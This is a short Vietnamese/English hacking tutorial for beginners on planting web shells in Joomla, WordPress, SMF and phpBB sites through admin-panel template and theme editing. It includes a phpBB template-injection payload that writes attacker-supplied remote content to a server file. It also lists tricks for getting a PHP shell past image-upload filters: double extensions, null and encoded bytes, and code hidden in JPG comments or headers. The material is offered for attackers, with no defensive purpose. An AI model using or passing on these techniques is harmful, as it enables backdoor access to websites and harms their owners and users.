Skip to main content

Kỹ thuật upshell cho Newbie

Up Shell đối với:

1.Joomla Site:

After Login into admin panel u will find Extensions on 5th No. expand this
click on it > Template Manager > check on any template (like beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...... Done name/index.php


Login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in name u edit/404.php


Login into adminpanel
u need to download any smf theme in zip format and put ur shell.php in it and save
admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php
after upload shell will find > name/shell.php


login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html
At down of:
PHP Code:

<!-- INCLUDE overall_header.html -->
We add:

[PHP]<!-- PHP -->
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->
And save it.
Now go on:

Shell find in site path/shell.php

5.Up shell qua bug up ảnh:

Nếu cho upload mỗi file image (bmp, gif, jpg, jpeg) thì sao ?
+ Thử thay đuôi cá xem : shell.php.jpg
+ Thử chơi NULL byte: shell.php.jpg
+ Thử mấy HEX byte chơi trội: shell.php%25%30%30.jpg
+ Thử mấy Unicode Byte shell.phpU+0025U+0030.jpg
+ Kiếm một file ảnh JPG, nhét nguyên code con shell vào trong comment của photo
+ Chèn code shell vào header của photo
<?php //code shell ?>
P/s: Chúc Newbie thành công.

Nguồn: Sưu Tầm